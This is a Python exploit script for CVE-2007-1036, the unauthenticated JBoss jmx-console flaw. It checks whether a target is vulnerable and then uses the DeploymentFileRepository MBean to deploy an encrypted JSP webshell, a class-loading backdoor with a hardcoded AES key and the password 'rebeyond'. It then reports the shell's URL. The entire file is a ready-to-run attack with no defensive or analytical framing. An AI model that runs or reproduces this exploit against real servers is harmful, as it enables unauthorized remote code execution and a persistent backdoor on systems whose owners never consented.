#!python3
# -*- encoding: utf-8 -*-
'''
@File    :   CVE-2007-1036.py
@Time    :   2023/04/07 09:52:16
@Author  :   mingy
@Version :   1.0
@Desc    :   None
'''

import requests
import time

print(">>> Set target url <<<")
host = input(">>> ")
uri_1 = "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin:service=DeploymentFileRepository"
uri_2 = "/jmx-console/HtmlAdaptor"
url_1 = f"{host}{uri_1}"
url_2 = f"{host}{uri_2}"

data = """action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=test6.war&arg1=test6&arg2=.jsp&arg3=%3C%25%40page+import%3D%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%22%25%3E%3C%25%21class+U+extends+ClassLoader%7BU%28ClassLoader+c%29%7Bsuper%28c%29%3B%7Dpublic+Class+g%28byte+%5B%5Db%29%7Breturn+super.defineClass%28b%2C0%2Cb.length%29%3B%7D%7D%25%3E%3C%25if+%28request.getMethod%28%29.equals%28%22POST%22%29%29%7BString+k%3D%22e45e329feb5d925b%22%3Bsession.putValue%28%22u%22%2Ck%29%3BCipher+c%3DCipher.getInstance%28%22AES%22%29%3Bc.init%282%2Cnew+SecretKeySpec%28k.getBytes%28%29%2C%22AES%22%29%29%3Bnew+U%28this.getClass%28%29.getClassLoader%28%29%29.g%28c.doFinal%28new+sun.misc.BASE64Decoder%28%29.decodeBuffer%28request.getReader%28%29.readLine%28%29%29%29%29.newInstance%28%29.equals%28pageContext%29%3B%7D%25%3E&arg4=True"""

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded"
}

def check():
    res = requests.get(url_1, headers=headers, verify=False)
    if "store()" in res.content.decode():
        print(f">>> CVE-2007-1036 Vuln: {host}<<<")
        return host
    else:
        print(">>> Don't have vuln !!! <<<")
        exit()


def getshell():
    res = requests.post(url_2, data=data, headers=headers, verify=False)
    if res.status_code == 200:
        url_shell = f"{host}/test6/test6.jsp"
        time.sleep(3)
        res_test = requests.get(url_shell, headers=headers, verify=False)
        if res_test.status_code == 200:
            print(f" >>> Getshell: {url_shell} Password: rebeyond<<<")
        else:
            print(">>> Access webshell fail !!! <<<")
    else:
        print(">>> Getshell fail !!! <<<")


if __name__ == '__main__' and check():
    getshell()